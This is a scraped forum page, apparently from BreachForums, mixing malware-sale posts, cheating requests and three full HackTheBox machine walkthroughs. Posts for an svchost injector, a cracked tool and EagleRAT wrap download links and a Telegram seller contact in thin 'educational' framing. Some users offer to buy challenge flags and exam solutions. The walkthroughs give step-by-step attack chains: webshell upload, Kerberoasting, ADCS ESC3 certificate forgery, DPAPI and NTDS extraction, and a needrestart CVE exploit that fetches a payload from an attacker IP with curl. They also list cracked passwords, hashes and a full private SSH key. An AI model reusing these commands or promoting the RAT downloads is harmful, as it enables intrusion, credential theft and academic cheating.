BreachForums - HackTheBox

SVCHOST Injector 2026

Thu, 07 May 2026 21:41:13 +0800

[center]https://myhackbox.com/wp-content/uploads/2026/04/1-7.webp[/center]

[center]=7SVCHOST Injector 2026[/center]

[center]

SVCHOST Injector 2026

The term SVCHOST Injector 2026 has recently gained attention in cybersecurity discussions. It refers to a category of techniques where malicious actors attempt to exploit the legitimate Windows process svchost.exe for unauthorized activities.

In modern operating systems, svchost.exe is a critical system component responsible for running multiple services. Because of its trusted nature, attackers often target it to hide malicious operations and evade detection.

This article explores the concept from a defensive and educational perspective, helping users understand risks and strengthen system security.

What is svchost.exe?
Understanding the Core Process
svchost.exe (Service Host) is a legitimate Windows process that:

Hosts multiple Windows services
Manages background operations
Optimizes system resource usage
Key Characteristics:
Runs multiple instances simultaneously
Essential for system stability
Located in C:\Windows\System32
Because it is always running, it becomes a prime target for misuse.

What Does “SVCHOST Injector 2026” Mean?
Threat Perspective
“SVCHOST Injector 2026” typically refers to modern malware techniques that:

Inject malicious code into svchost.exe
Hide malicious processes under legitimate names
Bypass antivirus detection mechanisms
Maintain persistence within the system
Why Attackers Use svchost.exe:
Trusted by Windows OS
Difficult to distinguish from normal processes
Runs with elevated privileges

[center]https://myhackbox.com/wp-content/uploads/2026/04/2-9.webp[/center]

=7Download Link

[/center]

=7Download Link

[/center]

=7Download Link

[/center]

Cold Seal 5.6 cracked Sensitive information can be exposed or stolen

Thu, 07 May 2026 21:38:31 +0800

[center]https://tse2.mm.bing.net/th/id/OIP.w1Z_31WHtXqwDuSHckXaHgHaE-?rs=1&pid=ImgDetMain&o=7&rm=3[/center]

[center]https://tse4.mm.bing.net/th/id/OIP.4yMzut9DcT0rpcD7jdsEbgHaEK?w=1280&h=720&rs=1&pid=ImgDetMain&o=7&rm=3[/center]

[center]=7Cold Seal 5.6 cracked[/center]

[center]

Cold Seal 5.6 cracked
Using unauthorized versions may seem tempting, but it comes with serious consequences:

Malware Infections – Many cracked files contain hidden viruses or spyware
Data Theft – Sensitive information can be exposed or stolen
Legal Issues – Violates copyright and software licensing laws
No Updates – You miss out on security patches and improvements
System Damage – Can corrupt files or slow down your device
For professionals like you—especially working in cybersecurity and digital media—these risks are not worth it.
Reliability
Official software ensures stable performance without unexpected crashes.

Security Assurance
You stay protected from malicious code and vulnerabilities.

Customer Support
Access to official help, documentation, and troubleshooting.

Professional Credibility
Using licensed tools builds trust with clients and partners.

[center]https://tse4.mm.bing.net/th/id/OIP.nHYhNh4Gkw44qP6qz2wv4AHaEK?w=1280&h=720&rs=1&pid=ImgDetMain&o=7&rm=3[/center]

[center]https://tse3.mm.bing.net/th/id/OIP.Iq9ZVmwYDxUkq_Q9rtc_bwHaEK?w=1280&h=720&rs=1&pid=ImgDetMain&o=7&rm=3[/center]

=7Download Link

[/center]

=7Download Link

[/center]

=7Download Link

[/center]

https://www.virustotal.com/gui/url/7386a...?nocache=1

EagleRAT v2.5 Create backdoor access points

Thu, 07 May 2026 21:37:14 +0800

[center]https://th.bing.com/th/id/R.0177f8c4943c49f8f6d42eb2baee9570?rik=ob9ueJ9TIWDGcw&riu=http%3a%2f%2feaglerat.weebly.com%2fuploads%2f2%2f6%2f3%2f6%2f26366556%2f4317251_orig.png&ehk=dT7FbF3wefMw%2fkh8Ko7qAuf9vqA5IOLgzBNCUxm6Ntg%3d&risl=&pid=ImgRaw&r=0[/center]

[center]https://i.ytimg.com/vi/gVQD_tOvlsI/maxresdefault.jpg?sqp=-oaymwEmCIAKENAF8quKqQMa8AEB-AH-CYAC0AWKAgwIABABGGUgZShlMA8=&rs=AOn4CLCSLvZywlS9nKMQLs7y7ng2AXywlQ[/center]

[center]=7EagleRAT v2.5[/center]

[center]

EagleRAT v2.5
EagleRAT v2.5 is a term commonly discussed in cybersecurity research circles to describe a Remote Access Trojan (RAT) family observed in threat analysis reports. RATs are malicious programs designed to give unauthorized remote control of a system. This article explains EagleRAT strictly for educational, defensive, and awareness purposes, helping users and organizations understand how such threats are identified and mitigated.
What Is Eagle_RAT?
EagleRAT refers to a remote access malware variant that attackers may use to monitor or control compromised systems without user consent.

Key Characteristics
Operates silently in the background
Focuses on unauthorized remote access
Commonly detected through behavioral analysis
Communicates with command infrastructure
Eagle_RAT v2.5 – General Behavior Overview
From an analytical perspective, EagleRAT v2.5 is associated with:

Persistent execution mechanisms
Interaction with system resources
Regular background activity
Evasion-focused design traits
These behaviors are studied by security teams to improve detection and prevention.

Why Eagle_RAT Is Considered a Security Risk
Any RAT, including EagleRAT, poses risks because it may:

Bypass user privacy
Access sensitive data
Monitor system activity
Create backdoor access points
Understanding these risks helps organizations strengthen cybersecurity defenses.

Contact for More Premium Tool : https://t.me/blackwolfreborn

[center]https://th.bing.com/th/id/R.e41252043b7e6f6942707ce079efd118?rik=wKtSddYRrySP0Q&riu=http%3a%2f%2feaglerat.weebly.com%2fuploads%2f2%2f6%2f3%2f6%2f26366556%2f4228321_orig.png&ehk=kiPdRVKQwrfKBznBkm37%2b0DlGl8HksXAbOtc5tDHpuw%3d&risl=&pid=ImgRaw&r=0[/center]

[center]https://th.bing.com/th/id/R.a5467f27e1985ebb4bc63fa227db199c?rik=Wmib1%2bgWZ2uCOw&riu=http%3a%2f%2feaglerat.weebly.com%2fuploads%2f2%2f6%2f3%2f6%2f26366556%2f1098171_orig.png&ehk=Wh6HBvVjJWtgNMu24vVO7xs4nFSqBVy5natGt18yRnw%3d&risl=&pid=ImgRaw&r=0[/center]

=7Download Link

[/center]

=7Download Link

[/center]

=7Download Link

[/center]

https://www.virustotal.com/gui/file/922b...?nocache=1

[FREE] HackTheBox All Cheatsheets

Mon, 27 Apr 2026 20:37:06 +0800

Hi,
I just share this with you cheatsheets dumped from https://www.hackthebox.com/cybersecurity...heatsheets, if it's down let me know:

Hidden Content

You must register or login to view this content.

Enjoy!

Looking for a few insane challenge flags

Sun, 26 Apr 2026 04:39:25 +0800

Looking for a few insane HTB flags:

ShadowStreamSherlock
Heapify
NFTDRM
Blinded
Sandcastle

Please let me know by sending me a DM. I will pay.

HTB CPTS - Hints / Writeup Trade for CRTP Writeup

Mon, 20 Apr 2026 18:31:05 +0800

anyone wants trade CRTP for hackthebox CPTS? or any free hints on WKS01 ? flag6

SUMMUS: Extreme Red Teamer Lab

Tue, 10 Feb 2026 23:37:16 +0800

Has anyone done then the SUMMUS: Extreme Red Teamer Lab?

Can anyone share writeup?

HTB - ARTIFICIAL.HTB - EASY LINUX

Tue, 10 Feb 2026 22:12:52 +0800

ARTIFICIAL - HACKTHEBOX
LINUX - EASY
IP: 10.10.11.74
dn: artificial.htb

Initial access
---------------------------------------
Vuln: https://splint.gitbook.io/cyberblog/secu...ious-model
Webapp allows uploading TensorFlow H5 models - executes Lambda layer code during inference

exploit.py: https://pastebin.com/cWyDqzv0 (waf block the code)

Build exploit (must be in docker or right env):

docker run -it --rm \
-v "$PWD":/workspace \
-w /workspace \
tensorflow/tensorflow:2.13.0 python3 exploit.py

Execute:
# Listener
nc -lvnp 1337

# Upload exploit.h5 via web interface
# Click "Show Prediction" to trigger payload
# Shell as uid-100 (app group)

DB Creds extract
-------------------
Find SQLite DB:
find . -name "*.db" 2>/dev/null
sqlite3 users.db
.tables
SE/LECT * FR/OM user; (REMOVE THE SLASH, WAF BLOCK ME)

Extracted hashes:
gael:c99175974b6e192936d97224638a34f8
mark:0f3d8c76530022670f1c6029eed09ccb
robert:b606c5f5136170f15444251665638b36
royer:bc25b1f80f544c0ab451c02a3dca9fc6
mary:bf041041e57f1aff3be7ea1abd6129d0

Crack with john:
john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md5 hashes.txt

Cracked:
gael:mattp005numbertwo
royer:marwinnarak043414036

SSH Access
------------------
ssh gael@artificial.htb
password: mattp005numbertwo
cat user.txt

Port discover
--------------
netstat -tlnp | grep 127.0.0.1
Found port 9898 on 127.0.0.1 LISTEN

Port forwarding:
ssh -L 9898:127.0.0.1:9898 gael@artificial.htb

BACKREST recon
--------------
Creds already found dont work - need to search for backup on server

find / -type f -name "*backup*" 2>/dev/null
Found: /var/backups/backrest_backup.tar.gz

Download and extract backrest_backup.tar.gz:
├── backrest
├── .config
│ └── backrest
│ └── config.json
├── install.sh
├── jwt-secret
├── oplog.sqlite
├── oplog.sqlite.lock
├── oplog.sqlite-shm
├── oplog.sqlite-wal
├── processlogs
│ └── backrest.log
├── restic
└── tasklogs
├── .inprogress
├── logs.sqlite
├── logs.sqlite-shm
└── logs.sqlite-wal

in config.json:

"name": "backrest_root",
"passwordBcrypt": "JDJhJDEwJGNWR0l5OVZNWFFkMGdNNWdpbkNtamVpMmtaUi9BQ01Na1Nzc3BiUnV0WVA1OEVCWnovMFFP"

Crack bcrypt hash:
echo 'JDJhJDEwJGNWR0l5OVZNWFFkMGdNNWdpbkNtamVpMmtaUi9BQ01Na1Nzc3BiUnV0WVA1OEVCWnovMFFP' | base64 -d > hash.bcrypt
john --wordlist=/usr/share/wordlists/rockyou.txt --format=bcrypt hash.bcrypt

Password: backrest_root:!@#$%^

Privesc
------------------------
Backrest access:
URL: http://localhost:9898
Creds: backrest_root / !@#$%^

Create repo first before creating plan:
Name: test
Type: Local
Path: /tmp

Create backup plan to grab root.txt:
Name: exploit
Repository: test
Paths: /root/

Get root.txt:
1. Execute backup via "Backup Now"
2. Wait for green status
3. Click completed backup → "Snapshot Browser"
4. Navigate to /root/root.txt in snapshot browser
5. Restore to /etc/root
6. Download restored file

Got root.txt flag
(can also get revshell with hook command option in plan)

Credentials summary (for noob)
-------------------
gael:mattp005numbertwo (SSH)
royer:marwinnarak043414036 (cracked hash)
backrest_root:!@#$%^ (Backrest web interface)

Exam solutions

Tue, 10 Feb 2026 02:05:25 +0800

DM me in discord.com/users/1205111888346742887 (@ninja0fninja) if you are interested in exams solution

HTB - VOLEUR.HTB - MEDIUM WINDOWS

Tue, 10 Feb 2026 01:00:53 +0800

VOLEUR - HACKTHEBOX
WINDOWS - MEDIUM

Can provide my personal notes for the machine if anyone's interested

IP: 10.10.11.76
Domain: voleur.htb
DC: dc.voleur.htb

KRB5.CONF Setup
---------------
[libdefaults]
default_realm = VOLEUR.HTB
dns_lookup_realm = false
dns_lookup_kdc = false

[realms]
VOLEUR.HTB = {
kdc = dc.voleur.htb
}

[domain_realm]
.voleur.htb = VOLEUR.HTB
voleur.htb = VOLEUR.HTB

Initial access (w given creds)
-----------------------------
getTGT.py -dc-ip 10.10.11.76 'voleur.htb/ryan.naylor:HollowOct31Nyt'
export KRB5CCNAME=ryan.naylor.ccache

SMB ENUM
---------------
netexec smb DC.VOLEUR.HTB -u ryan.naylor -p 'HollowOct31Nyt' -k --shares
netexec smb enum DC.VOLEUR.HTB --use-kcache --share IT --dir ""
netexec smb enum DC.VOLEUR.HTB --use-kcache --share IT --dir "First-Line Support"

Download encrypted Excel:
netexec smb DC.VOLEUR.HTB --use-kcache --get-file "First-Line Support/Access_Review.xlsx" "./Access_Review.xlsx" --share IT

Crack EXCEL pass
--------------------
office2john Access_Review.xlsx > xlsx.h
john xlsx.h --wordlist=/usr/share/wordlists/rockyou.txt
Result: football1

Decrypt n extract creds
------------------------
msoffcrypto-tool -p "football1" Access_Review.xlsx decrypted.xlsx
xlsx2csv decrypted.xlsx | sed -n '5p;12p;13p'

Found creds:
Todd.Wolfe - Password reset to NightT1meP1dg3on14, account deleted
svc_ldap - M1XyC9pW7qT5Vn
svc_iis - N5pXyW1VqM7CZ8

Targeting KERBEROASTING
-----------------------
getTGT.py -dc-ip 10.10.11.76 'voleur.htb/svc_ldap:M1XyC9pW7qT5Vn'
export KRB5CCNAME=svc_ldap.ccache
targetedKerberoast.py -v --dc-ip 10.10.11.76 --dc-host dc.VOLEUR.HTB -d "voleur.htb" -u "svc_ldap" -k --request-user svc_winrm -o kerberostable.txt

Got TGS hash:
$krb5tgs$23$*svc_winrm$VOLEUR.HTB$voleur.htb/svc_winrm*$cf6535bc0a95a2ed7b815852807efa4a$7c691543631009fafbab519015753c7a698f46eee1f81172b80fdc7870973917d63431bf32a302be9e41e8e8673c0c5fb3c532d0519992ccf29cdbf734110ea318f7c273267f5bd44ff89c3090a539c1c073b0ffce1271c0996951f850d627dd711136fc4b43d432339fe3ccb9b2cb5f80537dfab041dbed384d655a636ce03009d0f075c0ae151314739b464487e8db54661ae9b20dd4585ab895bfbc972979fe1cbccccfb1855e0b5b4b389ef54c26aa443e4db34d31ba325ffa413e7ff2411fe6f39abea6b62b9d20293aa9db7dbb422a108c2dcd357ebb4268255d182f2c06b682e98b56b7cf8094f50285e300c3cdf7f71054b14e0e04ac0d3d68644c290356457b55e6334054874aaa3d3eb6770f3fd859455ce5778532316cb3260f565bcafd7c7d2f144a55aa4447516ab48cbabf63f34b436164c69c0d304be917a8032406cdfa8d2c3b69ef545490ae5e6f109e6455445739b6283da1e819fbbbf0649b4b740cb444c7e38bc49ddb7372836c4a61039e3437165fd06231000cd41f5917494ab462999d0a885b3742dad0b3ca480a25bad5087c90d30f95633c5e3e105201cf82e7874ef0f1c15c1b88585ab5dddbf006e6b06b215eb3b8d23d7edc8da5f6e7bde088315e764129c6901d22922c5aa379c401a8dde101bf71d8f3dafacc33b994f807d1ae5138db18fd1757bf31eae41c98c6a68bc50809fca7973039c4899f878174a0933d69a8fa7eaa1eb8dd5688b319f66c7e3bc463f9bf92a9cc8bb96e740be99f8b74371ac102aafde1b96a1860f8478335296ff9d2827710349c61862e4c8b0dbaa4cbd62276e3a14075d3b70038fc25842e3210844fa7bf7cc1da0a209c08cf219fc0148ef19bd5efcb9d0bbacace0749fb18e665fa73b137952cbaf364005d5e6b1b70e916ef553d015de218974f5f5bbc7b677b5eb062ff2735a263f8afe77cc73f1acb026a33ebd5037990ddb8f108a5aeee0146a72ebf167a65c1bd0a1b68b0d4f283f3a1c688aba30b4169505def1b541010d2e54ab51ddcf1699bb3343d6a817a227a7c9df8d75c43d4da4eba17c6eed4d72b2450138e2135d80ffeb4d6393c95ad0bf28f74d43c960f6f6cc0aec28e07c5eb36b2665a2d261cfed516dd3cc459411da99ffa2d5dabc5c9dc899f537ef6add3deef15526fbb5175664c1f514f17c13de74c6d01f19b6ee93e911dbcc2a2b4b10e9a31aaf3c0fb6ed4a39e8a85a2b09c7b3c79b3f2b79345779d0aeef29c1d84d77a02f73e4f25bca3391c9795531bbd3c6fa371a69afa1c38185bfd47de627f8bf11601322bf16ddb73c68af700e3eccc901665cf4c227c4a6cb5f952ab35969934d40ae5699f6fe41dd0f839eaff4cb78a02023db6692d9ddf56dccdc3d3f33d934fc972bc2671c1e2a04bb97ddec87927918fb8b94ab59f9d6bbf13f08b100d767cce7c0ed386c4b64f9a11ebe387ed8e281106

Crack TGS:
john --wordlist=/usr/share/wordlists/rockyou.txt --format=krb5tgs kerberostable.txt
Result: svc_winrm:AFireInsidedeOzarctica980219afi

WINRM Access
-------------------------
getTGT.py -dc-ip 10.10.11.76 'voleur.htb/svc_winrm:AFireInsidedeOzarctica980219afi'
export KRB5CCNAME=FILEvc_winrm.ccache
evil-winrm -i dc.voleur.htb -k -u svc_winrm -r VOLEUR.HTB

Restore deleted user
----------------------------------
$cred = [PSCredential]::new("svc_ldap@voleur.htb", (ConvertTo-SecureString "M1XyC9pW7qT5Vn" -AsPlainText -Force))
Import-Module ActiveDirectory
Get-ADObject -Filter {sAMAccountName -eq "todd.wolfe"} -IncludeDeletedObjects -Credential $cred | Restore-ADObject -Credential $cred
Get-ADUser todd.wolfe

Access TODD.WOLFE SMB Share
---------------------------
getTGT.py -dc-ip 10.10.11.76 'voleur.htb/todd.wolfe:NightT1meP1dg3on14'
KRB5CCNAME=todd.wolfe.ccache smbclient.py -k -no-pass VOLEUR.HTB/todd.wolfe@dc.voleur.htb

use IT
cd Second-Line Support
cd Archived Users
cd todd.wolfe

DPAPI Creds extract
----------------------------
Found DPAPI protected creds in AppData/Roaming/Microsoft/

Extract masterkey:
dpapi.py masterkey -file "protect/S-1-5-21-3927696377-1337352550-2781715495-1110/08949382-134f-4c63-b93c-ce52efc0aa88" -sid "S-1-5-21-3927696377-1337352550-2781715495-1110" -password "NightT1meP1dg3on14"

Masterkey:
0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83

Decrypt creds:
dpapi.py credential -file "credentials/772275FAD58525253490A9B0039791D3" -key 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83

Result:
Username: jeremy.combs
Password: qT3V9pLXyN7W4m

JEREMY.COMBS Access
-------------------
getTGT.py -dc-ip 10.10.11.76 'voleur.htb/jeremy.combs:qT3V9pLXyN7W4m'
export KRB5CCNAME=FILE:jeremy.combs.ccache

evil-winrm -i dc.voleur.htb -k -u jeremy.combs -r VOLEUR.HTB (works but useless)

KRB5CCNAME=jeremy.combs.ccache smbclient.py -k -no-pass VOLEUR.HTB/jeremy.combs@dc.voleur.htb

SSH KEY Discover
-----------------
Found in SMB share:

note.txt.txt:
"Jeremy, I've had enough of Windows Backup! I've part configured WSL to see if we can utilize any of the backup tools from Linux. Please see what you can set up. Thanks, Admin"

id_rsa:
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

SSH access via WSL
--------------------------------
chmod 400 id_rsa
ssh -p 2222 -i id_rsa svc_backup@voleur.htb

AD Database extract
----------------------
Found in /mnt/c/IT/THIRD-LINE SUPPORT/:
./Active Directory: ntds.dit ntds.jfm
./registry: SECURITY SYSTEM

Extract NTLM hashes:
secretsdump.py -system SYSTEM -security SECURITY -ntds ntds.dit LOCAL

Administrator hash:
administrator:500:aad3b435b51404eeaad3b435b51404ee:e656e07c56d831611b577b160b259ad2:::

Admin Access
-----------
getTGT.py -dc-ip 10.10.11.76 -hashes :e656e07c56d831611b577b160b259ad2 voleur.htb/administrator
export KRB5CCNAME=FILE:administrator.ccache
evil-winrm -i dc.voleur.htb -k -u administrator -r VOLEUR.HTB

CREDENTIALS SUMMARY (for noobs)
-------------------
ryan.naylor:HollowOct31Nyt (Initial access)
Todd.Wolfe:NightT1meP1dg3on14 (Restored account)
svc_ldap:M1XyC9pW7qT5Vn (Excel file)
svc_iis:N5pXyW1VqM7CZ8 (Excel file)
svc_winrm:AFireInsidedeOzarctica980219afi (Kerberoasted)
jeremy.combs:qT3V9pLXyN7W4m (DPAPI)
administrator:e656e07c56d831611b577b160b259ad2 (NTDS dump)

HTB - CERTIFICATE.HTB - HARD WINDOWS

Tue, 10 Feb 2026 00:49:01 +0800

CERTIFICATE - HACKTHEBOX
WINDOWS - HARD
(if you want my detailed cheat sheet with more explanations just ask)

IP: 10.10.11.71
Hostname: certificate.htb
Domain: CERTIFICATE.HTB

Initial access
----------------------------------------
Web app has file upload restrictions - bypassed via ZIP concatenation

Exploit:
echo "test" > good.pdf
echo "" > x.php (REMOVE THE SLASH IN SYSTEM, ITS JUST 4 WAF BYPASS)
zip good.zip good.pdf
zip bad.zip x.php
cat good.zip bad.zip > final.zip

Upload at: http://certificate.htb/upload.php?s_id=44
Upload final.zip -> access webshell via x.php as xamppuser

DB Enum
--------------------
Found creds in db.php: certificate_webapp_user:cert!f!c@teDBPWD

MySQL queries (non-interactive shell): https://pastebin.com/Ni8az3vw (waf blocked me)

Extracted hash:
sara.b:$2y$04$CgDe/Thzw/Em/M4SkmXNbu0YdFo6uUs3nB.pzQPV.g8UdXikZNdH6
(other hashes didn't crack)

Cracked with hashcat:
hashcat -m 3200 hashes.txt /usr/share/wordlists/rockyou.txt
Result: sara.b:Blink182

WINRM + PCAP Analysis
---------------------
evil-winrm -u "sara.b" -p "Blink182" -i "10.10.11.71"

Found Kerberos AS-REQ in ~/ws-01/WS-01PktMon.pcap

Extract cipher with tshark:
tshark -r WS-01PktMon.pcap -Y "kerberos.msg_type==10 && kerberos.CNameString && kerberos.realm && kerberos.cipher" -T fields -e kerberos.CNameString -e kerberos.realm -e kerberos.cipher

Cipher: 23f5159fa1c66ed7b0e561543eba6c010cd31f7e4a4377c2925cf306b98ed1e4f3951a50bc083c9bc0f16f0f586181c9d4ceda3fb5e852f0

Format for hashcat:
$krb5pa$18$Lion.SK$CERTIFICATE.HTB$23f5159fa1c66ed7b0e561543eba6c010cd31f7e4a4377c2925cf306b98ed1e4f3951a50bc083c9bc0f16f0f586181c9d4ceda3fb5e852f0

Crack:
hashcat -m 19900 hash.txt /usr/share/wordlists/rockyou.txt -a 0
Result: lion.sk:!QAZ2wsx

ADCS ESC3 EXPLOIT
----------------------
evil-winrm -u "lion.sk" -p "!QAZ2wsx" -i "10.10.11.71"

Enumerate ADCS:
certipy find -u 'lion.sk@certificate.htb' -p '!QAZ2wsx' -dc-ip 10.10.11.71 -vulnerable

ESC3 conditions found:
- Extended Key Usage: Certificate Request Agent
- Enrollment Rights: CERTIFICATE.HTB\Domain CRA Managers (lion.sk is member)
- Authorized Signatures Required: 0
- Private Key Flag: ExportableKey

Exploit ESC3:
# Step 1: Request delegation cert
certipy req -u 'lion.sk@certificate.htb' -p '!QAZ2wsx' -dc-ip 10.10.11.71 -ca 'Certificate-LTD-CA' -template 'Delegated-CRA'

# Step 2: Request cert on behalf of ryan.k
certipy req -u 'lion.sk@certificate.htb' -p '!QAZ2wsx' -dc-ip 10.10.11.71 -ca 'Certificate-LTD-CA' -template 'SignedUser' -on-behalf-of ryan.k -pfx lion.sk.pfx
(for -template use one with client auth enabled and lion.sk enrollment rights)

# Step 3: Auth with cert
ntpdate certificate.htb
certipy auth -pfx ryan.k.pfx

Got NTLM hash:
ryan.k@certificate.htb: aad3b435b51404eeaad3b435b51404ee:b1bc3d70e70f4f36b1509a65ae1a2ae6

Privesc
----------------------------------
evil-winrm -u "ryan.k" -H "b1bc3d70e70f4f36b1509a65ae1a2ae6" -i 10.10.11.71

Download and run SeManageVolumeExploit: https://github.com/CsEnox/SeManageVolume...tag/public

Verify with: icacls C:/windows
Should show BUILTIN\Users with (M) modify permissions
(if you see "administrator" instead of "users" rerun exploit)

CA private key extract
---------------------------------
(tried DLL hijacking but EDR blocked it :trolled

Export CA private key:
certutil -exportPFX my "Certificate-LTD-CA" C:\temp\x.pfx
Download x.pfx to attacker box

Forge admin cert:
certipy forge -ca-pfx x.pfx -upn 'administrator@certificate.htb' -out system.pfx

Auth as admin:
ntpdate certificate.htb
certipy auth -pfx system.pfx

Got admin hash:
administrator@certificate.htb: aad3b435b51404eeaad3b435b51404ee:d804304519bf0143c14cbf1c024408c6

Credential summary (for noobs)
-------------------------------------------
sara.b:Blink182 (WinRM)
lion.sk:!QAZ2wsx (WinRM)
certificate_webapp_user:cert!f!c@teDBPWD (MySQL)
ryan.k:b1bc3d70e70f4f36b1509a65ae1a2ae6 (Pass-the-Hash)
administrator:d804304519bf0143c14cbf1c024408c6 (Pass-the-Hash)

HTB - CONVERSOR.HTB - EASY LINUX

Tue, 10 Feb 2026 00:36:42 +0800

CONVERSOR - HACKTHEBOX
LINUX - EASY
IP: 10.10.11.1 (OLD)

recon
-----
nmap -sS -sV -sC -p- --min-rate=10000 -T5 --max-retries=2 --defeat-rst-ratelimit -Pn -oN nmap.txt 10.10.11.1 (ctf command)

22/tcp - SSH OpenSSH 8.9p1
80/tcp - HTTP Apache httpd 2.4.52

Interesting endpoint:
/convert - XML/XSLT template upload

inital access
------------------------------
App allows XSLT template uploads. Downloaded source code, install.md reveals cron job executes all Python scripts in /scripts/ every minute.

Malicious XSLT payload: https://pastebin.com/yXUvZ8es (bf block me )

Get shell:
1. Start listener
2. Upload payload via web interface
3. Wait for cron job execution (every 1 min)
4. python3 -c 'import pty;pty.spawn("/bin/bash")'

Credentials extract
----------------------------------
Source code contains SQLite DB users.db

sqlite3 users.db
.tables
S/ELECT * F/ROM users; (remove the slash, waf block me)

MD5 hash:
fismathack:5b5c3ac3a1c897c94caad48e6c71fdec

Cracked via CrackStation:
fismathack:Keepmesafeandwarm

SSH access:
ssh fismathack@conversor.htb

Privesc
-------
sudo -l

User fismathack may run the following commands on conversor:
(ALL : ALL) NOPASSWD: /usr/sbin/needrestart

Check version:
/usr/sbin/needrestart --version

needrestart 3.7 - Restart daemons after library updates.

Vulnerable to CVE-2024-48990 (patched in 3.8)

CVE-2024-48990 Exploit
---------------------------
Vuln allows Python injection via PYTHONPATH when needrestart runs with sudo

Create malicious shared object (exploit.c): https://pastebin.com/cVZYXxRx

Compile:
gcc -shared -fPIC -o __init__.so exploit.c

exploit.sh:
#!/bin/bash
set -e

cd /tmp
mkdir -p malicious/importlib

curl http://10.10.1X.X:8000/__init__.so -o /tmp/malicious/importlib/__init__.so

/tmp/malicious/expl.py : https://pastebin.com/necqG4Tx

cd /tmp/malicious
PYTHONPATH="$PWD" python3 expl.py 2>/dev/null

Terminal 1 (attacker):
python3 -m http.server 8000

